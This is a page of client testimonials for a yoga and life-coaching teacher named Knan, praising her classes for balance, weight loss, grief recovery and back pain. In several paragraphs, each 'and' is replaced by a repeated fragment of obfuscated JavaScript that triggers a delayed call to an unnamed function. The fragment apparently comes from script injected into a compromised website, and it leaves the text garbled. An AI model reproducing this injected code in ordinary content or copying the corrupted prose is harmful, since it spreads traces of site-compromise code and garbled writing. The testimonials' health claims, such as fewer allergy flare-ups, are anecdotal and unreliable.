After college, I wanted to return to riding. I felt like a bobble head toy on my horse. After just one yoga session with Knan, my balance improved 100%. I am sitting tight in the saddle. I can communicate more effectively with my horse. He is happier. I am happier. We continue to improve each week. I have a yoga session just once a week. That is all it takes.

I have been a student of Knan's for 8 months. My first experience with her was personalized yoga lessons. We started by having her analyze my current potential to accomplish short term goals. Her knowledge of Yoga is vast, yet she was always willing to slow things down to patiently address my questions.  Her demeanor, voice andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and humor all add to a very pleasing experience andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and the time always flew by.

I eventually began to participate in group yoga at Mulberry Grove with Knan andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and have found this to be just as pleasing an experience. I thought that I would feel strange doing the poses in the company of others, but with Knan's humor andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and patience everybody has a good time. Finding my way through life after the loss of my wife to cancer was difficult until I enlisted Knan's life coaching andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and motivational goal setting assistance. When I was faced with difficult decisions, Knan did not provide answers as much as giving me the tools to find the answers myself. "I have lost two full clothing sizes."

I began Knan's Yogalates at Lake Center for Rehab in mid-December on Mondays andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Wednesdays. I enjoy the class because it is the perfect combination of core strengthening andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and stretching. I recently missed several classes due to other obligations. I noticed immediately the impact missing class had on my posture andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and my overall stamina, not to mention just feeling GOOD in my skin. Yogalates has improved my posture, stamina andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and improved my strength. Plus despite missing a few classes, I am happy to report that I have lost two full clothing sizes. Yogalates is great! Update: Since Knan no longer comes to The Villages, I come to her. Her new Studio is wonderful! One of the bonuses of my continued practice with Knan is that my allergies have not flared up this season, in what has been one of the allegedly worst allergy seasons ever.

"My chronic back pain is much better..."
